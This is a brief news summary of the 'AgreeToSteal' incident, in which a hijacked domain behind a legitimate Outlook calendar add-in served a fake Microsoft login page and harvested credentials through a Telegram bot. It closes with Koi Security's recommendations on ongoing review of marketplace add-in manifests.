A malicious Microsoft Outlook add-in has been discovered in the wild. The attack, known as “AgreeToSteal,” exploits a vulnerability in the Office add-in’s supply chain, allowing hackers to steal thousands of credentials. According to Koi Security, an unknown attacker hijacked a legitimate add-in’s domain to serve a fake Microsoft login page, capturing user passwords and exfiltrating sensitive data via a Telegram Bot API.
The Outlook add-in, AgreeTo, was developed by its creator as a calendar management tool. However, the attacker took advantage of the add-in’s dynamic nature, which relies on a manifest file that fetches content from the developer’s server in real-time. The attack compromised this vulnerability, allowing hackers to deploy malicious code and steal sensitive information.
Microsoft has signed off on the add-in’s manifest, but failed to continue monitoring its content after approval. This lack of oversight allowed the attacker to update the URL served by the manifest, redirecting users to a phishing kit. Koi Security recommends that Microsoft take steps to improve security, including re-reviewing manifests when they return different content and verifying domain ownership.
This attack highlights the need for more frequent monitoring of packaged dependencies across marketplaces and repositories. The structural problem is not limited to Microsoft Marketplace or the Office Store, but applies to all marketplaces hosting remote dynamic dependencies. Experts warn that approving once and trusting forever is a recipe for disaster, as demonstrated by the AgreeToSteal attack.
Source: https://thehackernews.com/2026/02/first-malicious-outlook-add-in-found.html